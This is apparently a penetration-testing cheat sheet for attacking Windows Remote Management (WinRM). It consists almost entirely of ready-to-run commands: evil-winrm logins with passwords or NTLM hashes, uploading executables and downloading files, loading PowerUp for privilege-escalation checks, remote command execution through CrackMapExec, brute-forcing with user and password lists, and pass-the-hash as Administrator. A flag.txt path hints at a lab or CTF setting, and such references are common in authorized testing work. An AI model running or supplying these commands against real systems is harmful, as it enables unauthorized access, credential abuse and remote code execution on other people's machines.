## Service Detection

```bash
nmap -sV -sC -p 5985,5986 TARGET
```

| Port | Protocol |
|---|---|
| 5985 | HTTP (WinRM) |
| 5986 | HTTPS (WinRM) |
## Evil-WinRM

```bash
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
```

### With SSL

```bash
evil-winrm -i TARGET -u user -p 'password' -S
```
### Upload / Download

```powershell
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
```
### Load PowerShell Scripts

```bash
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
```

```powershell
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
```
## CrackMapExec

```bash
crackmapexec winrm TARGET -u user -p password
crackmapexec winrm TARGET -u user -H NTLM_HASH
crackmapexec winrm TARGET -u user -p password -x "whoami"
crackmapexec winrm TARGET -u user -p password -X "Get-Process"
```

| Flag | Description |
|---|---|
| -x | CMD command |
| -X | PowerShell command |
## PowerShell Remoting (From Windows)

```powershell
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
```

### Execute Command

```powershell
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
```
## Brute-Force

```bash
crackmapexec winrm TARGET -u users.txt -p passwords.txt
```

## Pass-the-Hash

```bash
evil-winrm -i TARGET -u Administrator -H aad3b435b51404eeaad3b435b51404ee:NTLM_HASH
```
## Quick Reference

| Check | Command |
|---|---|
| Login | `evil-winrm -i TARGET -u user -p pass` |
| PtH | `evil-winrm -i TARGET -u user -H HASH` |
| Exec CMD | `crackmapexec winrm TARGET -u user -p pass -x "whoami"` |
| Brute-force | `crackmapexec winrm TARGET -u users.txt -p pass.txt` |